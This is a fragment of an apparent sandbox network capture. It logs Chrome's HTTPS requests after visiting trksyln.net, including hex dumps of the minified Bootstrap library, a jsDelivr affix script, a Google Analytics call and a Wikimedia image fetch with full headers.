                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:26 UTC1378INData Raw: 2f 2a 21 0a 20 20 2a 20 42 6f 6f 74 73 74 72 61 70 20 76 35 2e 30 2e 32 20 28 68 74 74 70 73 3a 2f 2f 67 65 74 62 6f 6f 74 73 74 72 61 70 2e 63 6f 6d 2f 29 0a 20 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 31 2d 32 30 32 31 20 54 68 65 20 42 6f 6f 74 73 74 72 61 70 20 41 75 74 68 6f 72 73 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 77 62 73 2f 62 6f 6f 74 73 74 72 61 70 2f 67 72 61 70 68 73 2f 63 6f 6e 74 72 69 62 75 74 6f 72 73 29 0a 20 20 2a 20 4c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 4d 49 54 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 77 62 73 2f 62 6f 6f 74 73 74 72 61 70 2f 62 6c 6f 62 2f 6d 61 69 6e 2f 4c 49 43 45 4e 53 45 29 0a 20 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62
                                                                                                                                                                                                                                                                                                                      Data Ascii: /*! * Bootstrap v5.0.2 (https://getbootstrap.com/) * Copyright 2011-2021 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors) * Licensed under MIT (https://github.com/twbs/bootstrap/blob/main/LICENSE) */!function(t,e){"ob
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:26 UTC1378INData Raw: 5b 31 5d 29 2c 65 3d 69 26 26 22 23 22 21 3d 3d 69 3f 69 2e 74 72 69 6d 28 29 3a 6e 75 6c 6c 7d 72 65 74 75 72 6e 20 65 7d 2c 6e 3d 74 3d 3e 7b 63 6f 6e 73 74 20 65 3d 69 28 74 29 3b 72 65 74 75 72 6e 20 65 26 26 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 65 29 3f 65 3a 6e 75 6c 6c 7d 2c 73 3d 74 3d 3e 7b 63 6f 6e 73 74 20 65 3d 69 28 74 29 3b 72 65 74 75 72 6e 20 65 3f 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 65 29 3a 6e 75 6c 6c 7d 2c 6f 3d 74 3d 3e 7b 74 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 6e 65 77 20 45 76 65 6e 74 28 22 74 72 61 6e 73 69 74 69 6f 6e 65 6e 64 22 29 29 7d 2c 72 3d 74 3d 3e 21 28 21 74 7c 7c 22 6f 62 6a 65 63 74 22 21 3d 74 79 70 65 6f 66 20 74 29 26 26 28 76 6f 69 64 20 30
                                                                                                                                                                                                                                                                                                                      Data Ascii: [1]),e=i&&"#"!==i?i.trim():null}return e},n=t=>{const e=i(t);return e&&document.querySelector(e)?e:null},s=t=>{const e=i(t);return e?document.querySelector(e):null},o=t=>{t.dispatchEvent(new Event("transitionend"))},r=t=>!(!t||"object"!=typeof t)&&(void 0
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:26 UTC1378INData Raw: 70 28 29 3b 69 66 28 65 29 7b 63 6f 6e 73 74 20 69 3d 74 2e 4e 41 4d 45 2c 6e 3d 65 2e 66 6e 5b 69 5d 3b 65 2e 66 6e 5b 69 5d 3d 74 2e 6a 51 75 65 72 79 49 6e 74 65 72 66 61 63 65 2c 65 2e 66 6e 5b 69 5d 2e 43 6f 6e 73 74 72 75 63 74 6f 72 3d 74 2c 65 2e 66 6e 5b 69 5d 2e 6e 6f 43 6f 6e 66 6c 69 63 74 3d 28 29 3d 3e 28 65 2e 66 6e 5b 69 5d 3d 6e 2c 74 2e 6a 51 75 65 72 79 49 6e 74 65 72 66 61 63 65 29 7d 7d 2c 22 6c 6f 61 64 69 6e 67 22 3d 3d 3d 64 6f 63 75 6d 65 6e 74 2e 72 65 61 64 79 53 74 61 74 65 3f 28 6d 2e 6c 65 6e 67 74 68 7c 7c 64 6f 63 75 6d 65 6e 74 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 22 2c 28 29 3d 3e 7b 6d 2e 66 6f 72 45 61 63 68 28 74 3d 3e 74 28 29 29 7d 29 2c 6d 2e 70 75
                                                                                                                                                                                                                                                                                                                      Data Ascii: p();if(e){const i=t.NAME,n=e.fn[i];e.fn[i]=t.jQueryInterface,e.fn[i].Constructor=t,e.fn[i].noConflict=()=>(e.fn[i]=n,t.jQueryInterface)}},"loading"===document.readyState?(m.length||document.addEventListener("DOMContentLoaded",()=>{m.forEach(t=>t())}),m.pu
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:26 UTC1378INData Raw: 67 65 73 74 75 72 65 73 74 61 72 74 22 2c 22 67 65 73 74 75 72 65 63 68 61 6e 67 65 22 2c 22 67 65 73 74 75 72 65 65 6e 64 22 2c 22 66 6f 63 75 73 22 2c 22 62 6c 75 72 22 2c 22 63 68 61 6e 67 65 22 2c 22 72 65 73 65 74 22 2c 22 73 65 6c 65 63 74 22 2c 22 73 75 62 6d 69 74 22 2c 22 66 6f 63 75 73 69 6e 22 2c 22 66 6f 63 75 73 6f 75 74 22 2c 22 6c 6f 61 64 22 2c 22 75 6e 6c 6f 61 64 22 2c 22 62 65 66 6f 72 65 75 6e 6c 6f 61 64 22 2c 22 72 65 73 69 7a 65 22 2c 22 6d 6f 76 65 22 2c 22 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 22 2c 22 72 65 61 64 79 73 74 61 74 65 63 68 61 6e 67 65 22 2c 22 65 72 72 6f 72 22 2c 22 61 62 6f 72 74 22 2c 22 73 63 72 6f 6c 6c 22 5d 29 3b 66 75 6e 63 74 69 6f 6e 20 78 28 74 2c 65 29 7b 72 65 74 75 72 6e 20 65 26 26 60 24 7b
                                                                                                                                                                                                                                                                                                                      Data Ascii: gesturestart","gesturechange","gestureend","focus","blur","change","reset","select","submit","focusin","focusout","load","unload","beforeunload","resize","move","DOMContentLoaded","readystatechange","error","abort","scroll"]);function x(t,e){return e&&`${
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:26 UTC1378INData Raw: 2c 75 2e 6f 72 69 67 69 6e 61 6c 48 61 6e 64 6c 65 72 3d 72 2c 75 2e 6f 6e 65 4f 66 66 3d 73 2c 75 2e 75 69 64 45 76 65 6e 74 3d 64 2c 63 5b 64 5d 3d 75 2c 74 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 61 2c 75 2c 6f 29 7d 66 75 6e 63 74 69 6f 6e 20 6a 28 74 2c 65 2c 69 2c 6e 2c 73 29 7b 63 6f 6e 73 74 20 6f 3d 53 28 65 5b 69 5d 2c 6e 2c 73 29 3b 6f 26 26 28 74 2e 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 69 2c 6f 2c 42 6f 6f 6c 65 61 6e 28 73 29 29 2c 64 65 6c 65 74 65 20 65 5b 69 5d 5b 6f 2e 75 69 64 45 76 65 6e 74 5d 29 7d 66 75 6e 63 74 69 6f 6e 20 4d 28 74 29 7b 72 65 74 75 72 6e 20 74 3d 74 2e 72 65 70 6c 61 63 65 28 45 2c 22 22 29 2c 43 5b 74 5d 7c 7c 74 7d 63 6f 6e 73 74 20 50 3d 7b 6f 6e 28 74 2c 65 2c 69 2c 6e 29 7b
                                                                                                                                                                                                                                                                                                                      Data Ascii: ,u.originalHandler=r,u.oneOff=s,u.uidEvent=d,c[d]=u,t.addEventListener(a,u,o)}function j(t,e,i,n,s){const o=S(e[i],n,s);o&&(t.removeEventListener(i,o,Boolean(s)),delete e[i][o.uidEvent])}function M(t){return t=t.replace(E,""),C[t]||t}const P={on(t,e,i,n){
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:26 UTC1378INData Raw: 52 3d 7b 73 65 74 28 74 2c 65 2c 69 29 7b 48 2e 68 61 73 28 74 29 7c 7c 48 2e 73 65 74 28 74 2c 6e 65 77 20 4d 61 70 29 3b 63 6f 6e 73 74 20 6e 3d 48 2e 67 65 74 28 74 29 3b 6e 2e 68 61 73 28 65 29 7c 7c 30 3d 3d 3d 6e 2e 73 69 7a 65 3f 6e 2e 73 65 74 28 65 2c 69 29 3a 63 6f 6e 73 6f 6c 65 2e 65 72 72 6f 72 28 60 42 6f 6f 74 73 74 72 61 70 20 64 6f 65 73 6e 27 74 20 61 6c 6c 6f 77 20 6d 6f 72 65 20 74 68 61 6e 20 6f 6e 65 20 69 6e 73 74 61 6e 63 65 20 70 65 72 20 65 6c 65 6d 65 6e 74 2e 20 42 6f 75 6e 64 20 69 6e 73 74 61 6e 63 65 3a 20 24 7b 41 72 72 61 79 2e 66 72 6f 6d 28 6e 2e 6b 65 79 73 28 29 29 5b 30 5d 7d 2e 60 29 7d 2c 67 65 74 3a 28 74 2c 65 29 3d 3e 48 2e 68 61 73 28 74 29 26 26 48 2e 67 65 74 28 74 29 2e 67 65 74 28 65 29 7c 7c 6e 75 6c 6c 2c
                                                                                                                                                                                                                                                                                                                      Data Ascii: R={set(t,e,i){H.has(t)||H.set(t,new Map);const n=H.get(t);n.has(e)||0===n.size?n.set(e,i):console.error(`Bootstrap doesn't allow more than one instance per element. Bound instance: ${Array.from(n.keys())[0]}.`)},get:(t,e)=>H.has(t)&&H.get(t).get(e)||null,
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:26 UTC1378INData Raw: 6f 6e 73 74 20 65 3d 74 2e 63 6c 61 73 73 4c 69 73 74 2e 63 6f 6e 74 61 69 6e 73 28 22 66 61 64 65 22 29 3b 74 68 69 73 2e 5f 71 75 65 75 65 43 61 6c 6c 62 61 63 6b 28 28 29 3d 3e 74 68 69 73 2e 5f 64 65 73 74 72 6f 79 45 6c 65 6d 65 6e 74 28 74 29 2c 74 2c 65 29 7d 5f 64 65 73 74 72 6f 79 45 6c 65 6d 65 6e 74 28 74 29 7b 74 2e 72 65 6d 6f 76 65 28 29 2c 50 2e 74 72 69 67 67 65 72 28 74 2c 22 63 6c 6f 73 65 64 2e 62 73 2e 61 6c 65 72 74 22 29 7d 73 74 61 74 69 63 20 6a 51 75 65 72 79 49 6e 74 65 72 66 61 63 65 28 74 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 65 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 63 6f 6e 73 74 20 65 3d 57 2e 67 65 74 4f 72 43 72 65 61 74 65 49 6e 73 74 61 6e 63 65 28 74 68 69 73 29 3b 22 63 6c 6f 73 65 22 3d 3d 3d 74 26 26 65
                                                                                                                                                                                                                                                                                                                      Data Ascii: onst e=t.classList.contains("fade");this._queueCallback(()=>this._destroyElement(t),t,e)}_destroyElement(t){t.remove(),P.trigger(t,"closed.bs.alert")}static jQueryInterface(t){return this.each((function(){const e=W.getOrCreateInstance(this);"close"===t&&e
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:26 UTC1378INData Raw: 2e 6c 65 6e 67 74 68 29 2c 65 5b 6e 5d 3d 7a 28 74 2e 64 61 74 61 73 65 74 5b 69 5d 29 7d 29 2c 65 7d 2c 67 65 74 44 61 74 61 41 74 74 72 69 62 75 74 65 3a 28 74 2c 65 29 3d 3e 7a 28 74 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 64 61 74 61 2d 62 73 2d 22 2b 24 28 65 29 29 29 2c 6f 66 66 73 65 74 28 74 29 7b 63 6f 6e 73 74 20 65 3d 74 2e 67 65 74 42 6f 75 6e 64 69 6e 67 43 6c 69 65 6e 74 52 65 63 74 28 29 3b 72 65 74 75 72 6e 7b 74 6f 70 3a 65 2e 74 6f 70 2b 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 2e 73 63 72 6f 6c 6c 54 6f 70 2c 6c 65 66 74 3a 65 2e 6c 65 66 74 2b 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 2e 73 63 72 6f 6c 6c 4c 65 66 74 7d 7d 2c 70 6f 73 69 74 69 6f 6e 3a 74 3d 3e 28 7b 74 6f 70 3a 74 2e 6f 66 66 73 65 74 54 6f 70 2c 6c 65 66 74 3a 74 2e
                                                                                                                                                                                                                                                                                                                      Data Ascii: .length),e[n]=z(t.dataset[i])}),e},getDataAttribute:(t,e)=>z(t.getAttribute("data-bs-"+$(e))),offset(t){const e=t.getBoundingClientRect();return{top:e.top+document.body.scrollTop,left:e.left+document.body.scrollLeft}},position:t=>({top:t.offsetTop,left:t.
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:26 UTC1378INData Raw: 74 7c 7c 28 74 68 69 73 2e 5f 69 73 50 61 75 73 65 64 3d 21 31 29 2c 74 68 69 73 2e 5f 69 6e 74 65 72 76 61 6c 26 26 28 63 6c 65 61 72 49 6e 74 65 72 76 61 6c 28 74 68 69 73 2e 5f 69 6e 74 65 72 76 61 6c 29 2c 74 68 69 73 2e 5f 69 6e 74 65 72 76 61 6c 3d 6e 75 6c 6c 29 2c 74 68 69 73 2e 5f 63 6f 6e 66 69 67 26 26 74 68 69 73 2e 5f 63 6f 6e 66 69 67 2e 69 6e 74 65 72 76 61 6c 26 26 21 74 68 69 73 2e 5f 69 73 50 61 75 73 65 64 26 26 28 74 68 69 73 2e 5f 75 70 64 61 74 65 49 6e 74 65 72 76 61 6c 28 29 2c 74 68 69 73 2e 5f 69 6e 74 65 72 76 61 6c 3d 73 65 74 49 6e 74 65 72 76 61 6c 28 28 64 6f 63 75 6d 65 6e 74 2e 76 69 73 69 62 69 6c 69 74 79 53 74 61 74 65 3f 74 68 69 73 2e 6e 65 78 74 57 68 65 6e 56 69 73 69 62 6c 65 3a 74 68 69 73 2e 6e 65 78 74 29 2e 62
                                                                                                                                                                                                                                                                                                                      Data Ascii: t||(this._isPaused=!1),this._interval&&(clearInterval(this._interval),this._interval=null),this._config&&this._config.interval&&!this._isPaused&&(this._updateInterval(),this._interval=setInterval((document.visibilityState?this.nextWhenVisible:this.next).b
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:26 UTC1378INData Raw: 58 29 3a 74 68 69 73 2e 74 6f 75 63 68 53 74 61 72 74 58 3d 74 2e 63 6c 69 65 6e 74 58 7d 2c 69 3d 74 3d 3e 7b 74 68 69 73 2e 74 6f 75 63 68 44 65 6c 74 61 58 3d 74 2e 74 6f 75 63 68 65 73 26 26 74 2e 74 6f 75 63 68 65 73 2e 6c 65 6e 67 74 68 3e 31 3f 30 3a 74 2e 74 6f 75 63 68 65 73 5b 30 5d 2e 63 6c 69 65 6e 74 58 2d 74 68 69 73 2e 74 6f 75 63 68 53 74 61 72 74 58 7d 2c 6e 3d 74 3d 3e 7b 21 74 68 69 73 2e 5f 70 6f 69 6e 74 65 72 45 76 65 6e 74 7c 7c 22 70 65 6e 22 21 3d 3d 74 2e 70 6f 69 6e 74 65 72 54 79 70 65 26 26 22 74 6f 75 63 68 22 21 3d 3d 74 2e 70 6f 69 6e 74 65 72 54 79 70 65 7c 7c 28 74 68 69 73 2e 74 6f 75 63 68 44 65 6c 74 61 58 3d 74 2e 63 6c 69 65 6e 74 58 2d 74 68 69 73 2e 74 6f 75 63 68 53 74 61 72 74 58 29 2c 74 68 69 73 2e 5f 68 61 6e
                                                                                                                                                                                                                                                                                                                      Data Ascii: X):this.touchStartX=t.clientX},i=t=>{this.touchDeltaX=t.touches&&t.touches.length>1?0:t.touches[0].clientX-this.touchStartX},n=t=>{!this._pointerEvent||"pen"!==t.pointerType&&"touch"!==t.pointerType||(this.touchDeltaX=t.clientX-this.touchStartX),this._han


                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                      15192.168.2.449778151.101.193.2294437284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:26 UTC559OUTGET /npm/bootstrap-affix@1.0.1/assets/js/affix.min.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                      Host: cdn.jsdelivr.net
                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                                                      Referer: https://trksyln.net/
                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:26 UTC773INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                      Content-Length: 2754
                                                                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                      Access-Control-Expose-Headers: *
                                                                                                                                                                                                                                                                                                                      Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=31536000, s-maxage=31536000, immutable
                                                                                                                                                                                                                                                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                                                      Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                                                                                                                                      X-JSD-Version: 1.0.1
                                                                                                                                                                                                                                                                                                                      X-JSD-Version-Type: version
                                                                                                                                                                                                                                                                                                                      ETag: W/"ac2-OwtoaIo59xCfoKcJqLdO5pCpf00"
                                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                      Age: 658736
                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 18:19:26 GMT
                                                                                                                                                                                                                                                                                                                      X-Served-By: cache-fra-eddf8230032-FRA, cache-dfw-kdal2120025-DFW
                                                                                                                                                                                                                                                                                                                      X-Cache: MISS, HIT
                                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                      alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:26 UTC1378INData Raw: 2f 2a 2a 0a 20 2a 20 4d 69 6e 69 66 69 65 64 20 62 79 20 6a 73 44 65 6c 69 76 72 20 75 73 69 6e 67 20 54 65 72 73 65 72 20 76 35 2e 31 39 2e 32 2e 0a 20 2a 20 4f 72 69 67 69 6e 61 6c 20 66 69 6c 65 3a 20 2f 6e 70 6d 2f 62 6f 6f 74 73 74 72 61 70 2d 61 66 66 69 78 40 31 2e 30 2e 31 2f 61 73 73 65 74 73 2f 6a 73 2f 61 66 66 69 78 2e 6a 73 0a 20 2a 0a 20 2a 20 44 6f 20 4e 4f 54 20 75 73 65 20 53 52 49 20 77 69 74 68 20 64 79 6e 61 6d 69 63 61 6c 6c 79 20 67 65 6e 65 72 61 74 65 64 20 66 69 6c 65 73 21 20 4d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 3a 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6a 73 64 65 6c 69 76 72 2e 63 6f 6d 2f 75 73 69 6e 67 2d 73 72 69 2d 77 69 74 68 2d 64 79 6e 61 6d 69 63 2d 66 69 6c 65 73 0a 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28
                                                                                                                                                                                                                                                                                                                      Data Ascii: /** * Minified by jsDelivr using Terser v5.19.2. * Original file: /npm/bootstrap-affix@1.0.1/assets/js/affix.js * * Do NOT use SRI with dynamically generated files! More information: https://www.jsdelivr.com/using-sri-with-dynamic-files */!function(
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:26 UTC1376INData Raw: 73 2e 24 74 61 72 67 65 74 2e 73 63 72 6f 6c 6c 54 6f 70 28 29 2c 65 3d 74 68 69 73 2e 24 65 6c 65 6d 65 6e 74 2e 6f 66 66 73 65 74 28 29 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 69 6e 6e 65 64 4f 66 66 73 65 74 3d 65 2e 74 6f 70 2d 74 7d 2c 69 2e 70 72 6f 74 6f 74 79 70 65 2e 63 68 65 63 6b 50 6f 73 69 74 69 6f 6e 57 69 74 68 45 76 65 6e 74 4c 6f 6f 70 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 73 65 74 54 69 6d 65 6f 75 74 28 74 2e 70 72 6f 78 79 28 74 68 69 73 2e 63 68 65 63 6b 50 6f 73 69 74 69 6f 6e 2c 74 68 69 73 29 2c 31 29 7d 2c 69 2e 70 72 6f 74 6f 74 79 70 65 2e 63 68 65 63 6b 50 6f 73 69 74 69 6f 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 74 68 69 73 2e 24 65 6c 65 6d 65 6e 74 2e 69 73 28 22 3a 76 69 73 69 62 6c 65 22 29 29 7b 76 61 72 20 65 3d
                                                                                                                                                                                                                                                                                                                      Data Ascii: s.$target.scrollTop(),e=this.$element.offset();return this.pinnedOffset=e.top-t},i.prototype.checkPositionWithEventLoop=function(){setTimeout(t.proxy(this.checkPosition,this),1)},i.prototype.checkPosition=function(){if(this.$element.is(":visible")){var e=


                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                      16192.168.2.44978164.233.167.1564437284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:26 UTC887OUTPOST /g/collect?v=2&tid=G-JH2MNQ1WXY&cid=1627253267.1730398763&gtm=45je4au0v9106823843za200&aip=1&dma=0&gcd=13l3l3l3l1l1&npa=0&frm=0&tag_exp=101533422~101823848~101878899~101878944~101925629 HTTP/1.1
                                                                                                                                                                                                                                                                                                                      Host: stats.g.doubleclick.net
                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                                                      Origin: https://trksyln.net
                                                                                                                                                                                                                                                                                                                      X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUX
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                      Referer: https://trksyln.net/
                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                      Cookie: test_cookie=CheckForPermission
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:26 UTC842INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: https://trksyln.net
                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 18:19:26 GMT
                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                      Expires: Fri, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                                                                                                                                                                                                      Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                                                      Content-Type: text/plain
                                                                                                                                                                                                                                                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                                                                                      Content-Security-Policy-Report-Only: script-src 'none'; form-action 'none'; frame-src 'none'; report-uri https://csp.withgoogle.com/csp/scaffolding/ascnsrsggc:111:0
                                                                                                                                                                                                                                                                                                                      Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to=coop_reporting
                                                                                                                                                                                                                                                                                                                      Report-To: {"group":"coop_reporting","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/scaffolding/ascnsrsggc:111:0"}],}
                                                                                                                                                                                                                                                                                                                      Server: Golfe2
                                                                                                                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                      Connection: close


                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                      17192.168.2.449782185.15.59.2404437284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:26 UTC662OUTGET /wikipedia/commons/thumb/7/7d/Microsoft_.NET_logo.svg/1200px-Microsoft_.NET_logo.svg.png HTTP/1.1
                                                                                                                                                                                                                                                                                                                      Host: upload.wikimedia.org
                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                                      Referer: https://trksyln.net/
                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:26 UTC1068INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                      date: Thu, 31 Oct 2024 11:48:50 GMT
                                                                                                                                                                                                                                                                                                                      etag: e78b7bd4e07bfd2389ecb0c9baf2d9c4
                                                                                                                                                                                                                                                                                                                      server: ATS/9.2.5
                                                                                                                                                                                                                                                                                                                      content-type: image/png
                                                                                                                                                                                                                                                                                                                      content-disposition: inline;filename*=UTF-8''Microsoft_.NET_logo.svg.png
                                                                                                                                                                                                                                                                                                                      last-modified: Thu, 11 Jul 2024 08:02:42 GMT
                                                                                                                                                                                                                                                                                                                      content-length: 6633
                                                                                                                                                                                                                                                                                                                      age: 23436
                                                                                                                                                                                                                                                                                                                      x-cache: cp3077 hit, cp3077 hit/50
                                                                                                                                                                                                                                                                                                                      x-cache-status: hit-front
                                                                                                                                                                                                                                                                                                                      server-timing: cache;desc="hit-front", host;desc="cp3077"
                                                                                                                                                                                                                                                                                                                      strict-transport-security: max-age=106384710; includeSubDomains; preload
                                                                                                                                                                                                                                                                                                                      report-to: { "group": "wm_nel", "max_age": 604800, "endpoints": [{ "url": "https://intake-logging.wikimedia.org/v1/events?stream=w3c.reportingapi.network_error&schema_uri=/w3c/reportingapi/network_error/1.0.0" }] }
                                                                                                                                                                                                                                                                                                                      nel: { "report_to": "wm_nel", "max_age": 604800, "failure_fraction": 0.05, "success_fraction": 0.0}
                                                                                                                                                                                                                                                                                                                      x-client-ip: 173.254.250.77
                                                                                                                                                                                                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                                                                                                                                                                                                      access-control-allow-origin: *
                                                                                                                                                                                                                                                                                                                      access-control-expose-headers: Age, Date, Content-Length, Content-Range, X-Content-Duration, X-Cache
                                                                                                                                                                                                                                                                                                                      timing-allow-origin: *
                                                                                                                                                                                                                                                                                                                      accept-ranges: bytes
                                                                                                                                                                                                                                                                                                                      connection: close
